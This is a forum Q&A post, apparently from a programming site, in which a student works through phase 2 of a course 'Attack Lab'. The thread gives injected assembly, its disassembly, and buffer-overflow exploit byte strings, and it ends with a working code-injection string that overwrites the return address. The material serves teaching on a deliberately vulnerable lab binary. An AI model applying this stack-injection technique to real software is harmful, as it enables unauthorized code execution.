I have a buffer overflow lab I have to do for a project called The Attack Lab. I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten the correct exploit code I need (confirmed with TA):

movq $0x4ed659a2,$rdi pushq $0x4018c3 //address of touch2 ret 

I compiled and disassemble this code:

Disassembly of section .text:

 0: 48 c7 c7 a2 59 d6 4e mov $0x4ed659a2,%rdi 7: 68 c3 18 40 00 pushq $0x4018c3 c: c3 retq 

I want to find the correct exploit string to pass into the program? The address of %rsp is 0x5560a188.

My TA said the comment of this discussion is correct so I tried this exploit string

48 c7 c7 a2 59 d6 4e 00 68 c3 18 40 00 00 00 00 c3 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 

but this is incorrect. It did not even reach touch2.

Before that, I worked on the solution like this:

48 c7 c7 a2 59 d6 4e c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 c3 18 40 00 00 00 00 00 

for

0: 48 c7 c7 a2 59 d6 4e mov $0x4ed659a2,%rdi 7: c3 retq 

and got a segfault.

I disassembled rtarget here. ctarget and rtarget behave the same.

Thanks.

11

1 Answer

I have asked my professor and got the solution.

Initially, my incorrect exploit string was

48 c7 c7 a2 59 d6 4e 00 68 c3 18 40 00 00 00 00 c3 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 

However, my prof told me NOT to add any extra bytes between the instructions. So I tried

48 c7 c7 a2 59 d6 4e 68 c3 18 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 

and it works!

Thus, we just need to make sure that all bytes of the instructions are together with no padding between, and don't mess up the order of instruction in term of bytes!

1

Your Answer

Sign up or log in

Sign up using Google Sign up using Facebook Sign up using Email and Password

Post as a guest

By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy